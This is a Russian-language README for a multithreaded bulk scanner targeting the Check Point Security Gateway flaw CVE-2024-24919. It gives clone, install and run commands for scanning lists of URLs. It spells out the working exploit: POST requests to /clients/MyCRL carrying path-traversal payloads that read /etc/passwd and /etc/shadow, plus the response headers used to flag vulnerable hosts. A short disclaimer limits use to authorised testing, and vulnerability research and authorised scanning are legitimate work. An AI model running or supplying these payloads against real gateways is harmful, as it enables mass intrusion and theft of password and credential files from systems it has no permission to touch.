
CVE-2024-24919 [Check Point Security Gateway Раскрытие информации]
CVE-2024-24919 [Утечка информации о шлюзе безопасности Check Point]
Скрипт основан на работе, авторство принадлежит: https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
Этот Python-скрипт сканирует список URL-адресов на уязвимость CVE-2024-24919, отправляя специальные POST-запросы и проверяя заголовки ответа и код состояния. Он записывает детали запроса и ответа и определяет уязвимые URL-адреса на основе заданных критериев.

[!WARNING] Предназначено только для образовательных целей и тестирования в корпоративных средах. https://x.com/__nav1n_/ https://github.com/ifconfig-me не несет ответственности за код, используйте на свой страх и риск. Не атакуйте цель, на которую у вас нет разрешения на взаимодействие.
[!NOTE] Многопоточность: Новая версия v2 теперь поддерживает многопоточность. Скрипт создает 50 потоков для параллельной обработки URL-адресов для более быстрого сканирования, и это количество потоков можно контролировать с помощью
-t100. Очередь: Очередь используется для управления URL-адресами и их распределения по рабочим потокам. Ход и результаты: Скрипт выводит ход и результаты с использованием цветного вывода.
requeststermcolorКлонируйте репозиторий:
git clone https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner.git
cd CVE-2024-24919-Bulk-Scanner
Установите необходимые библиотеки:
pip install requests termcolor
Подготовьте файл со списком URL-адресов:
Создайте текстовый файл (например, urls.txt) с одним URL-адресом на строку. Убедитесь, что каждый URL начинается с https://. Пример:
https://example.com
https://testsite.com
https://vulnerable.com
https://123.456.789.10:8080
Запустите скрипт:
python CVE-2024-24919-auto-v2.py -t 150 -f urls.txt
Проверьте вывод:
Скрипт выведет ход сканирования и результаты в терминал. Уязвимые URL-адреса будут отмечены сообщением Vulnerable URL found:.
Результаты:
request-analyze.txt и request-analyze-v2.txt в версии v2.checkpoint-results.txt и checkpoint-results-v2.txt в версии v2.Скрипт отправляет POST-запросы к конечной точке /clients/MyCRL каждого URL с двумя полезными нагрузками:
aCSHELL/../../../../../../../etc/passwdaCSHELL/../../../../../../../etc/shadowОн проверяет заголовки ответа по следующим критериям:
Server: Check Point SVN foundationX-UA-Compatible: IE=EmulateIE7X-Frame-Options: SAMEORIGINHTTP/1.0 200 OKЕсли ответ соответствует хотя бы одному из трех перечисленных выше критериев, URL считается уязвимым.
